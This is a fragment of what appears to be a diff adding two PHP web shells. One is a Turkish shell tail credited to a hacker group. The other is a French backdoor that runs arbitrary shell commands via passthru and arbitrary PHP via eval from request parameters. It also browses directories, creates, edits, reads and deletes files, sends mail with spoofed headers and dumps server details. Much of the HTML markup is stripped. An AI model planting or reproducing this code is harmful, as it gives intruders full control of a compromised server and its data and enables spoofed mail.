Bulundugunuz Dizin: + Root/'; + +if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('%s/', + $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); + } +} + +?> +

+

Dizin Degistir : + +

+

Komut: + + +

+

Surekli Bagli Kal + +

+ +
+ +
+
+
+ +

Copyright © 2006–2007, Powered byThehacker. v 2.1 - www.ayyildiz.org

+

Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.

+

+
+ + + + + + +
+ + + +"); +print("Exécuter du code PHP
"); +print("Lister un répertoires
"); +print("Gérer les fichiers
"); +print("Envoyer un mail
"); +print("Infos serveur
"); +print("Contacter le créateur

"); + + +/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */ +$option = $_REQUEST["option"]; +$rep = $_REQUEST["rep"]; +$nom = $_REQUEST["nom"]; +$option_file = $_REQUEST["option_file"]; +$cmd = $_REQUEST["cmd"]; +$code = $_REQUEST["code"]; +$msg = $_REQUEST["msg"]; +$option_mail = $_REQUEST["option_mail"]; +$destinataire = $_REQUEST["destinataire"]; +$sujet = $_REQUEST["sujet"]; +$message = $_REQUEST["message"]; + +if($option == 1){ + print("
$remf Commande :
"); + echo "
PS : peu de serveurs acceptent les commandes venant de PHP"; +} + +if($option == 2){ + print("
$remf Code :
"); +} + +if($option == 3){ + print("
$remf Répertoire à lister :
"); + print("$rep"); +} + +if($option == 4){ + print("
$remf"); + print("
Nom du fichier :
"); + print(""); + print("Créer le +fichier"); + print("Éditer le +fichier"); + print("Supprimer le +fichier"); + print("Lire le +fichier"); + print(""); + print("
"); +} + + +if($option == 5){ + print("
$remf Destinataire : "); + print("
Provenance du mail :
"); + print("Adresse de retour :
"); + print("Sujet :
"); + print("Message :
"); +} + +if($option == 6){ + echo"Nom du serveur : $SERVER_NAME
+"; + echo"Adresse IP du serveur : $SERVER_ADDR
"; + echo"Port utilisé par défault 80 : $SERVER_PORT
"; + echo"Mail de l' admin : $SERVER_ADMIN

"; + + + echo"Racine du serveur : $DOCUMENT_ROOT
"; + echo"Adresse menant à COMMAND.COM : $COMSPEC
"; + echo"Path installé sur le serveur : $PATH
"; + echo"OS, SERVEUR, version PHP : $SERVER_SOFTWARE

"; + + echo"Version du protocole utilisé (HTTP) : $SERVER_PROTOCOL
"; + echo"En-tête Accept du protocole HTTP : $HTTP_ACCEPT
"; + echo"En tête User_agent du protocole HTTP : $HTTP_USER_AGENT
"; + echo"En-tête Accept-Charset du protocole HTTP : $HTTP_ACCEPT_CHARSET
"; + echo"En-tête Accept-Encoding du protocole HTTP : $HTTP_ACCEPT_ENCODING
"; + echo"En-tête Accept-Language du protocole HTTP : $HTTP_ACCEPT_LANGUAGE
"; + echo"En-tête Connection du protocole HTTP : $HTTP_CONNECTION
"; + echo"En-tête Host du protocole HTTP : $HTTP_HOST

"; + + echo"Version de CGI : $GATEWAY_INTERFACE
"; + echo"Version de récupération du form : $REQUEST_METHOD
"; + echo"Argument de l' adresse : $QUERY_STRING
"; + echo"Nom du script : $SCRIPT_NAME
"; + echo"Chemin du script : $SCRIPT_FILENAME
"; + echo"Adresse entière du script : $REQUEST_URI +
"; +} + +/* Commande*******/ +if($cmd != "") +{ + echo "{${passthru($cmd)}}
"; +} +/* Commande*******/ + + +/* Exécution de code PHP**********/ +if($code != ""){ + $code = stripslashes($code); + eval($code); +} +/* Execution de code PHP**********/ + + +/* Listing de rep******************/ +if($rep != "") +{ + if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/"; + $dir=opendir($rep); + while ($file = readdir($dir)) + { + if (is_dir("$rep/$file") && $file!='.') + { + echo"
  • (rep) $file +
    \n"; + }elseif(is_file("$rep/$file")) + { + echo "
  • (file) $file del edit
    \n"; + } + } +} +/* Listing de rep******************/ + + +/* Gestion des fichiers*********************/ +if($option_file == "mkdir" && $nom != "") +{ + $fp = fopen($nom, "w"); + fwrite($fp, stripslashes($msg)); + print("Fichier crée/modifié"); +} + +if($option_file == "read" && $nom != "") +{ + $fp = fopen($nom, "r"); + $file = fread($fp, filesize($nom)); + $file = htmlentities ($file, ENT_QUOTES); + $file = nl2br($file); + echo "
    $file"; +} + +if($option_file == "del" && $nom != "") +{ + unlink($nom); + print("Fichier effacé"); +} + +if($option_file == "edit" && $nom != "") +{ + $fp = fopen($nom, "r"); + $file = fread($fp, filesize($nom)); + $file = htmlentities ($file, ENT_QUOTES); + echo "
    $remf"; + echo ""; + echo ""; + echo ""; + echo "
    PS : les fichiers trop longs ne passent po :("; + echo "
    "; +} +/* Gestion des fichiers*********************/ + + +/* Envoi de mails************************/ +if(($destinataire != "" ) && ($sujet != "") && ($message != "")){ + $option_mail = "From: $provenance \n"; + $option_mail .= "Reply-to: $retour \n"; + $option_mail .= "X-Mailer: Mailer by rAidEn \n"; + + mail($destinataire, $sujet, $message, $option_mail); + + print("Mail envoyé a : $destinataire ..."); +} +/* Envoi de mails************************/ + +print(""); +/*print("